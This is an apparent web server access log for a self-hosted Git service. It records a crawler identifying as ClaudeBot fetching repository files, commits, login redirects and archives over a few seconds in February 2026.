"/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9839] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fglobal.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 216.73.216.188] [Length 9834] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2F.vscode" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/index.html" [Client 216.73.216.188] [Length 9762] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 120357] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 12978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=closed" [Client 216.73.216.188] [Length 8476] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.bundle" [Client 216.73.216.188] [Length 12783685] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11334] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11949] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fweekly" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/index.tsx" [Client 216.73.216.188] [Length 804] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2F.TemporaryDocument%2FQUICKSTART.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt?display=source" [Client 216.73.216.188] [Length 11341] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 17215] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 216.73.216.188] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16489] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/index.tsx" [Client 216.73.216.188] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore?display=source" [Client 216.73.216.188] [Length 11095] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Factivity%2Fhalfweekly" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 216.73.216.188] [Length 9849] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14223] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13947] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10915] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2FDockerfile" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=source" [Client 216.73.216.188] [Length 12949] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 7499] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13890] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2FDockerfile" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 362] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10840] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 216.73.216.188] [Length 10989] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.zip" [Client 216.73.216.188] [Length 25548926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 10888] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 216.73.216.188] [Length 3437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https 